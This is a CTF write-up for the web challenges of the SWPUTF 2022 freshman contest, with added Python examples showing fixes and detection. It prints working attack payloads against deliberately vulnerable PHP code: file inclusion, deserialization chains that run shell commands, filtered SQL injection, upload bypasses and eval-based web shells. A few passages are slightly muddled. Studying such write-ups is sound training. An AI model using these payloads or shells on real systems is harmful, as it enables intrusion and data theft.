SWPUTF 2022 Freshman Competition-WEB part of wp

Table of Contents

ez_ez_php

ez_ez_php(revenge)

Wonderful MD5

1z_unserialize

numgame

where_am_i

ez_ez_unserialize

js_sign

xff

webdog1__start

ez_sql

funny_php

funny_web

ez_1zpop

Ez_upload

file_master

Power!


ez_ez_php

source code:

<?php
error_reporting(0);
if (isset($_GET['file'])) {
    if ( substr($_GET["file"], 0, 3) === "php" ) {
        echo "Nice!!!";
        include($_GET["file"]);
    }

    else {
        echo "Hacker!!";
    }
}else {
    highlight_file(__FILE__);
}
//flag.php

The file is included, but the first 3 characters of the parameter are limited to php

So use the php:// pseudo-protocol (filter) directly

?file=php://filter/convert.base64-encode/resource=flag.php

payload:

?file=php://filter/read=convert.base64-encode/resource=flag

base64 decoding

ez_ez_php(revenge)

source code:

<?php
error_reporting(0);
if (isset($_GET['file'])) {
    if ( substr($_GET["file"], 0, 3) === "php" ) {
        echo "Nice!!!";
        include($_GET["file"]);
    }

    else {
        echo "Hacker!!";
    }
}else {
    highlight_file(__FILE__);
}
//flag.php

payload:

?file=php://filter/convert.base64-encode/resource=/flag

base64 decoding

Wonderful MD5

ffifdyop

After md5 encryption: 276f722736c95d99e921722cf9ed621c

Then convert it into a raw string: it begins with 'or'6, and the rest is unprintable bytes

Used as the password it becomes:

select * from admin where password=''or'6...'

which is equivalent to select * from admin where password='' or 1, i.e. sql injection

Check out the source code

md5 bypass

payload:

?x=240610708&y=QLTHNDT

Visit f1na11y.php

Array bypass directly:

wqh[]=1&dsy[]=2

1z_unserialize

source code:

<?php
 
class lyh{
    public $url = 'NSSCTF.com';
    public $lt;
    public $lly;
     
     function __destruct()
     {
        $a = $this->lt;

        $a($this->lly);
     }
    
    
}
unserialize($_POST['nss']);
highlight_file(__FILE__);
 
 
?> 

As long as the injection point is passed in, $a becomes system and $this->lly becomes ls or cat; it is a simple command injection

payload:

<?php
 
class lyh{
    public $url = 'NSSCTF.com';
    public $lt;
    public $lly;
}
$a = new lyh();
$a->lt='system';
$a->lly='ls /';
echo serialize($a);
 
?>

nss=O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:4:"ls /";}

The next step is just cat flag.

nss=O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:9:"cat /flag";}

numgame

Open developer tools in settings

Just go into settings and disable js

flag in js file

base64 decoding

Our goal is to pass the parameter p via GET and then call the static method ctf of the class nss through call_user_func.

if (preg_match("/n|c/m",$_GET['p'], $matches))

It filters out the characters n and c (the /m modifier just turns on multi-line mode),

call_user_func($_GET['p']); calls the function passed in by p

Here is a knowledge point

You can call the static method CTF of the class NSS through NSS::CTF. Class names and method names here are not case-sensitive.

So we can change the case to bypass the filter

And because of hint2.php

So payload :

?p=Nss2::Ctf

where_am_i

guess phone number

Just search for pictures

02886112888

ez_ez_unserialize

source code:

<?php
class X
{
    public $x = __FILE__;
    function __construct($x)
    {
        $this->x = $x;
    }
    function __wakeup()
    {
        if ($this->x !== __FILE__) {
            $this->x = __FILE__;
        }
    }
    function __destruct()
    {
        highlight_file($this->x);
        //flag is in fllllllag.php
    }
}
if (isset($_REQUEST['x'])) {
    @unserialize($_REQUEST['x']);
} else {
    highlight_file(__FILE__);
}

payload:

<?php
class X
{
    public $x = 'fllllllag.php';
}
$a=new X;
echo serialize($a);
?>
O:1:"X":1:{s:1:"x";s:13:"fllllllag.php";}

__wakeup also has to be bypassed, since it resets x back to __FILE__

So change it to (declaring more attributes than the object actually has skips __wakeup):

?x=O:1:"X":2:{s:1:"x";s:13:"fllllllag.php";}

js_sign

Look at the source code

There is js

This should be the key to solving the problem

A tool is used here

CTF online tool – online tap code | tap code encoding | tap code algorithm | tap code (hiencode.com)

Decode with spaces

3343431344215434452124331421311122125444113513341415

This will appear

flag

NSSCTF{youfindflagbytapcode}

xff

webdog1__start

The usual md5 bypass is to pass in a value whose md5 starts with 0e. In PHP's weak comparison (==) a string that looks numeric is converted to a number, and a string of the form 0e followed only by digits is read as 0 times a power of ten, i.e. 0. So two different digests that both start with 0e and continue with digits only compare as equal. Here the incoming value also has to be equal to its own md5 value, so we need a value that starts with 0e and whose md5 also starts with 0e, for example: 0e215962017. Plain strings whose md5 is 0e + digits include QNKCDZO and s878926199a.

?web=0e215962017 

View source code

"Bot" usually means robots.txt. In future challenges you may occasionally run into robots.txt leaking a hint.

It is garbled at first; just fix the text encoding (in Firefox the option can be found in the customized toolbar)

It's quite hidden

Here strstr filters spaces

str_ireplace replaces flag with spaces

payload:

?get=system(ls);

Equivalently (with a tab in place of the filtered space):

?get=system("cat /f*");

ez_sql

"A relatively safe way to pass parameters" should refer to passing parameters via POST.

Try passing a

Things shouldn't be that simple

By trying we find that spaces and or are filtered

Spaces can be replaced with /**/, and filtered keywords can be double-written

nss=1'/**/oorrder/**/by/**/4#

From this we know the table has 3 columns

Dump the database name (union is double-written the same way)

nss=1'/**/ununionion/**/select/**/1,updatexml(1,concat(0x7e,(select/**/database()),0x7e),1)#

Dump the table names (the or inside information_schema also has to be double-written)

nss=1'/**/ununionion/**/select/**/1,updatexml(1,concat(0x7e,(select/**/group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema='NSS_db'),0x7e),1)#

Dump the columns of NSS_tb

nss=1'/**/ununionion/**/select/**/1,updatexml(1,concat(0x7e,(select/**/group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='NSS_tb'),0x7e),1)#

Dump the flag

nss=1'/**/ununionion/**/select/**/1,updatexml(1,concat(0x7e,(select/**/group_concat(flll444g)/**/from/**/NSS_tb),0x7e),1)#

It’s fake at first glance

Dump Secr3t

nss=0'/**/ununionion/**/select/**/1,(select/**/group_concat(Secr3t)/**/from/**/NSS_tb),3#

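
The double-writing bypass above (the same single-pass deletion that funny_php's NSSCTF check falls to) and why a keyword blacklist is the wrong fix, as an added example in Python that is not part of the original writeup. The filter is a constructed model of the challenge (its server code is not on the page), NSS_tb is a constructed in-memory SQLite table, and MySQL's # terminator is swapped for SQLite's --.

```python
import sqlite3

# Constructed model of the challenge filter: spaces are rejected and "union" /
# "or" are deleted in a single pass, which is exactly why double-written
# keywords such as "ununionion" and "oorrder" come out as "union" / "order".
def single_pass_filter(nss: str) -> str:
    if " " in nss:
        raise ValueError("space blocked")
    for kw in ("union", "or"):
        nss = nss.replace(kw, "")
    return nss

def fixpoint_filter(nss: str) -> str:
    # Re-applying the deletion until nothing changes defeats double-writing,
    # but it is still a blacklist; the real fix is the bound parameter below.
    prev = None
    while prev != nss:
        prev, nss = nss, single_pass_filter(nss)
    return nss

def make_db() -> sqlite3.Connection:
    # Constructed stand-in for NSS_tb, using the column names from the writeup.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE NSS_tb(id INTEGER, flll444g TEXT, Secr3t TEXT)")
    db.execute("INSERT INTO NSS_tb VALUES (1, 'NSSCTF{fake}', 'NSSCTF{constructed_secret}')")
    return db

def vulnerable_lookup(db: sqlite3.Connection, nss: str) -> list:
    # The filtered text is spliced into the SQL string, so whatever survives
    # the filter is executed as SQL.
    sql = "SELECT id, flll444g, Secr3t FROM NSS_tb WHERE id='%s'" % single_pass_filter(nss)
    return db.execute(sql).fetchall()

def safe_lookup(db: sqlite3.Connection, nss: str) -> list:
    # Bound parameter: the payload is data, never SQL, so no filter is needed.
    return db.execute(
        "SELECT id, flll444g, Secr3t FROM NSS_tb WHERE id=?", (nss,)).fetchall()

# The writeup's Secr3t payload with '#' replaced by SQLite's '--' comment.
PAYLOAD = ("0'/**/ununionion/**/select/**/1,"
           "(select/**/group_concat(Secr3t)/**/from/**/NSS_tb),3/**/--")

if __name__ == "__main__":
    db = make_db()
    print("after filter:", single_pass_filter(PAYLOAD))
    print("concatenated:", vulnerable_lookup(db, PAYLOAD))  # leaks Secr3t
    print("parameterised:", safe_lookup(db, PAYLOAD))       # []
```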
funny_php

source code:
<?php
    session_start();
    highlight_file(__FILE__);
    if(isset($_GET['num'])){
        if(strlen($_GET['num'])<=3 && $_GET['num']>999999999){
            echo ":D";
            $_SESSION['L1'] = 1;
        }else{
            echo ":C";
        }
    }
    if(isset($_GET['str'])){
        $str = preg_replace('/NSSCTF/',"",$_GET['str']);
        if($str === "NSSCTF"){
            echo "wow";
            $_SESSION['L2'] = 1;
        }else{
            echo $str;
        }
    }
    if(isset($_POST['md5_1']) && isset($_POST['md5_2'])){
        if($_POST['md5_1']!==$_POST['md5_2'] && md5($_POST['md5_1'])==md5($_POST['md5_2'])){
            echo "Nice!";
            if(isset($_POST['md5_1']) && isset($_POST['md5_2'])){
                if(is_string($_POST['md5_1']) && is_string($_POST['md5_2'])){
                    echo "yoxi!";
                    $_SESSION['L3'] = 1;
                }else{
                    echo "X(";
                }
            }
        }else{
            echo "G";
            echo $_POST['md5_1']."\n".$_POST['md5_2'];
        }
    }
    if(isset($_SESSION['L1']) && isset($_SESSION['L2']) && isset($_SESSION['L3'])){
        include('flag.php');
        echo $flag;
    }
?>

Let’s explain step by step

first step

if(isset($_GET['num'])){
        if(strlen($_GET['num'])<=3 && $_GET['num']>999999999){
            echo ":D";
            $_SESSION['L1'] = 1;
        }else{
            echo ":C";
        }
    }

It is required that num has length at most 3 but compares greater than 999999999. 1e9 comes to mind immediately (a numeric string is compared as a number).

So payload:

?num=1e9

Step 2

if(isset($_GET['str'])){
        $str = preg_replace('/NSSCTF/',"",$_GET['str']);
        if($str === "NSSCTF"){
            echo "wow";
            $_SESSION['L2'] = 1;
        }else{
            echo $str;
        }
    } 

This will replace the NSSCTF in the string you passed in with empty, then we only need to use double writing to bypass it.

?str=NSSNSSCTFCTF

third step

if(isset($_POST['md5_1']) && isset($_POST['md5_2'])){
        if($_POST['md5_1']!==$_POST['md5_2'] && md5($_POST['md5_1'])==md5($_POST['md5_2'])){
            echo "Nice!";
            if(isset($_POST['md5_1']) && isset($_POST['md5_2'])){
                if(is_string($_POST['md5_1']) && is_string($_POST['md5_2'])){
                    echo "yoxi!";
                    $_SESSION['L3'] = 1;
                }else{
                    echo "X(";
                }
            }
        }else{
            echo "G";
            echo $_POST['md5_1']."\n".$_POST['md5_2'];
        }
    }

Here the md5 weak comparison can be bypassed directly (is_string requires strings, so the array trick is out; 0e magic strings still work)

md5_1=240610708&md5_2=QLTHNDT

So payload:

GET:
?num=1e9&str=NSSNSSCTFCTF
POST:
md5_1=240610708&md5_2=QLTHNDT
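The 0e weak comparison used in this step, in Wonderful MD5 and in webdog1__start, modelled in Python as an added example (not code from the writeup). php_loose_eq approximates PHP 7's == on two strings, and hmac.compare_digest stands in for ===/hash_equals(); the numeric-string regex is this model's assumption.

```python
import hashlib
import hmac
import re

# PHP 7 '==' on two strings: if both look numeric they are compared as numbers,
# so "0e462..." and "0e405..." are both 0.0 and therefore "equal".
# (Approximation of PHP's numeric-string rule; an assumption of this model.)
_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")

def php_loose_eq(a: str, b: str) -> bool:
    if _NUMERIC.match(a) and _NUMERIC.match(b):
        return float(a) == float(b)
    return a == b

def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()

def is_magic_md5(s: str) -> bool:
    """True when md5(s) is '0e' followed only by digits, i.e. 0 under ==."""
    h = md5_hex(s)
    return h.startswith("0e") and h[2:].isdigit()

def weak_password_check(supplied: str, stored: str) -> bool:
    # The pattern behind md5($_POST['md5_1']) == md5($_POST['md5_2']).
    return php_loose_eq(md5_hex(supplied), md5_hex(stored))

def strict_password_check(supplied: str, stored: str) -> bool:
    # Equivalent of === / hash_equals(): byte-for-byte, constant time,
    # no numeric coercion, so 0e digests no longer collide.
    return hmac.compare_digest(md5_hex(supplied), md5_hex(stored))

def self_md5_check(web: str) -> bool:
    # The webdog1__start condition: the value must loosely equal its own md5.
    # 0e215962017 passes because both sides are 0e-plus-digits strings.
    return php_loose_eq(web, md5_hex(web))

def raw_md5_prefix(s: str) -> bytes:
    # md5($s, true) as in the ffifdyop trick: the raw digest begins with the
    # bytes 'or'6, which is what closes the password='...' quote.
    return hashlib.md5(s.encode()).digest()[:5]

if __name__ == "__main__":
    print(md5_hex("240610708"), md5_hex("QLTHNDT"))
    print("weak:", weak_password_check("240610708", "QLTHNDT"))
    print("strict:", strict_password_check("240610708", "QLTHNDT"))
```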

funny_web

Account: NSS

Password: 2122693401

payload:

?num=12345a

ez_1zpop

source code:

<?php
error_reporting(0);
class dxg
{
   function fmm()
   {
      return "nonono";
   }
}

class lt
{
   public $impo='hi';
   public $md51='weclome';
   public $md52='to NSS';
   function __construct()
   {
      $this->impo = new dxg;
   }
   function __wakeup()
   {
      $this->impo = new dxg;
      return $this->impo->fmm();
   }

   function __toString()
   {
      if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)
         return $this->impo->fmm();
   }
   function __destruct()
   {
      echo $this;
   }
}

class fin
{
   public $a;
   public $url = 'https://www.ctfer.vip';
   public $title;
   function fmm()
   {
      $b = $this->a;
      $b($this->title);
   }
}

if (isset($_GET['NSS'])) {
   $Data = unserialize($_GET['NSS']);
} else {
   highlight_file(__file__);
}

fin object

The fmm method assigns $this->a to $b and then calls $b($this->title). So if a='system' is set, title is the command we want to run.

For example, to get system('ls'): a='system'; title='ls'.

lt object

Deserialization triggers __wakeup and __destruct. In __wakeup, impo is given a new dxg object and its fmm() result is returned directly, so nothing useful comes out of that path. Bypassing __wakeup is very simple: just increase the object's attribute count in the serialized string, for example O:3:"fin":3:{s:1:"a";N;s:3:"url";N;s:5:"title";N;} => O:3:"fin":4:{s:1:"a";N;s:3:"url";N;s:5:"title";N;}

Triggering __destruct is very simple: it echoes the object as a string, which directly triggers __toString, which (once the md5 check passes) returns the result of the fmm method.

payload:

<?php
class lt
{
    public $impo;
    public $md51='240610708';
    public $md52='QLTHNDT';
}
class fin
{
   public $a='system';
   public $ur='111';
   public $title='ls /';

}
$aa=new lt();
$aa->impo=new fin();
echo serialize($aa);
?>

Modify the number of lt attributes here to bypass __wakeup

?NSS=O:2:"lt":4:{s:4:"impo";O:3:"fin":3:{s:1:"a";s:6:"system";s:2:"ur";s:3:"111";s:5:"title";s:4:"ls /";}s:4:"md51";s:9:"240610708";s:4:"md52";s:7:"QLTHNDT";}

take flag

payload:

<?php
class lt
{
    public $impo;
    public $md51='240610708';
    public $md52='QLTHNDT';
}
class fin
{
   public $a='system';
   public $ur='111';
   public $title='cat /flag';

}
$aa=new lt();
$aa->impo=new fin();
echo serialize($aa);
?>

?NSS=O:2:"lt":4:{s:4:"impo";O:3:"fin":3:{s:1:"a";s:6:"system";s:2:"ur";s:3:"111";s:5:"title";s:9:"cat /flag";}s:4:"md51";s:9:"240610708";s:4:"md52";s:7:"QLTHNDT";}
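The attribute-count trick used here and in ez_ez_unserialize leaves a visible fingerprint: the declared property count no longer matches the properties present. The following is an added example, not from the writeup, that parses the serialize() subset these payloads use (N, i, s, O) and flags such objects; it assumes ASCII payloads, so character length equals PHP's byte length.

```python
# Minimal parser for the PHP serialize() subset in this writeup: N, i, s and O
# (nested objects allowed). Strings are taken as ASCII, so character length
# equals PHP's byte length; that is an assumption of this parser.
def parse(data: str, i: int = 0):
    """Return (value, index just past the value). Objects become dicts."""
    t = data[i]
    if t == "N":                                   # N;
        return None, i + 2
    if t == "i":                                   # i:123;
        end = data.index(";", i)
        return int(data[i + 2:end]), end + 1
    if t == "s":                                   # s:len:"bytes";
        colon = data.index(":", i + 2)
        n, start = int(data[i + 2:colon]), colon + 2
        if data[start + n:start + n + 2] != '";':
            raise ValueError("string length %d is wrong at offset %d" % (n, i))
        return data[start:start + n], start + n + 2
    if t == "O":                                   # O:len:"Class":count:{...}
        colon = data.index(":", i + 2)
        n = int(data[i + 2:colon])
        name = data[colon + 2:colon + 2 + n]
        j = colon + n + 4                          # just past the closing '":'
        brace = data.index(":", j)
        declared, j, props = int(data[j:brace]), brace + 2, {}
        while data[j] != "}":                      # key;value; pairs
            key, j = parse(data, j)
            val, j = parse(data, j)
            props[key] = val
        return {"class": name, "declared": declared, "props": props}, j + 1
    raise ValueError("unsupported token %r at offset %d" % (t, i))

def wakeup_bypass_suspects(value, found=None) -> list:
    """Classes whose declared property count differs from the properties
    actually present: the fingerprint of the __wakeup-skipping trick."""
    found = [] if found is None else found
    if isinstance(value, dict):
        if value["declared"] != len(value["props"]):
            found.append(value["class"])
        for v in value["props"].values():
            wakeup_bypass_suspects(v, found)
    return found

def check_payload(data: str) -> list:
    value, end = parse(data)
    if end != len(data):
        raise ValueError("trailing data after offset %d" % end)
    return wakeup_bypass_suspects(value)
```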

Ez_upload

File Upload

Upload .htaccess file

<FilesMatch "mochu">
SetHandler application/x-httpd-php
</FilesMatch>

Modify Content-Type

Upload shell.mochu

<script language="php">@eval($_POST['1']);</script>

Just access shell.mochu

file_master

First write a.php, containing:

GIF89a
<?=eval($_POST['1']);?>

upload

Modify Content-Type

Found that height and width have limitations

Modify GIF89a to:

#define height 1
#define width 1

Ant Sword is connected but I can’t access the flag. I don’t know why.

I’ll look at what other masters wrote later.

#define height 1
#define width 1
<?=`nl /f*`;?>

Power!

Take a look at the source code

Blind guess: passing a source parameter via GET returns the source code

Source code :

<?php
    class FileViewer{
        public $black_list = "flag";
        public $local = "http://127.0.0.1/";
        public $path;
        public function __call($f,$a){
            $this->loadfile();
        }
        public function loadfile(){
            if(!is_array($this->path)){
                if(preg_match("/".$this->black_list."/i",$this->path)){
                    $file = $this->curl($this->local."cheems.jpg");
                }else{
                    $file = $this->curl($this->local.$this->path);
                }
            }else{
                $file = $this->curl($this->local."cheems.jpg");
            }
            echo '<img src="data:jpg;base64,'.base64_encode($file).'"/>';
        }
        public function curl($path){
            $url = $path;
            $curl = curl_init();
            curl_setopt($curl, CURLOPT_URL, $url);
            curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($curl, CURLOPT_HEADER, 0);
            $response = curl_exec($curl);
            curl_close($curl);
            return $response;
        }
        public function __wakeup(){
            $this->local = "http://127.0.0.1/";
        }
    }
    class Backdoor{
        public $a;
        public $b;
        public $superhacker = "hacker.jpg";
        public function goodman($i,$j){
            $i->$j = $this->superhacker;
        }
        public function __destruct(){
            $this->goodman($this->a,$this->b);
            $this->a->c();
        }
    }
    if(isset($_GET['source'])){
        highlight_file(__FILE__);
    }else{
        if(isset($_GET['image_path'])){
            $path = $_GET['image_path']; //flag in /flag.php
            if(is_string($path) && !preg_match("/http:|gopher:|glob:|php:/i",$path)){
                echo '<img src="data:jpg;base64,'.base64_encode(file_get_contents($path)).'"/>';
            }else{
                echo '<h2>Seriously</h2><img src="data:jpg;base64,'.base64_encode(file_get_contents("cheems.jpg")).'"/>';
            }
            
        }else if(isset($_GET['path_info'])){
            $path_info = $_GET['path_info'];
            $FV = unserialize(base64_decode($path_info));
            $FV->loadfile();
        }else{
            $path = "vergil.jpg";
            echo '<h2>POWER!!</h2>
            <img src="data:jpg;base64,'.base64_encode(file_get_contents($path)).'"/>';
        }
    }
?> 

Didn’t quite understand

Check out the boss’s wp here

NSS[SWPUTF 2022 Freshman Competition]ez_sql + funny_php + js_sign + funny_web + Power! – bilibili (bilibili.com)

<?php
    class FileViewer{
        public $black_list ="The blacklist has nothing to do with me";
        public $local;
        public $path="flag.php";
    }
    class Backdoor{
        public $a;
        public $b;
        public $superhacker ="127.0.0.1:65500/";
        }
$m = new FileViewer;
$n = new Backdoor;
$n->a=$m;
$n->b="local";
$m->local=$n;

echo (base64_encode(serialize($m)));
?> 

payload:

?path_info=TzoxMDoiRmlsZVZpZXdlciI6Mzp7czoxMDoiYmxhY2tfbGlzdCI7czozMDoi6buR5ZCN5Y2V5LuA5LmI55qE566h5LiN552A5oiRIjtzOjU6ImxvY2FsIjtPOjg6IkJhY2tkb29yIjozOntzOjE6ImEiO3I6MTtzOjE6ImIiO3M6NToibG9jYWwiO3M6MTE6InN1cGVyaGFja2VyIjtzOjE2OiIxMjcuMC4wLjE6NjU1MDAvIjt9czo0OiJwYXRoIjtzOjg6ImZsYWcucGhwIjt9

base64 decoding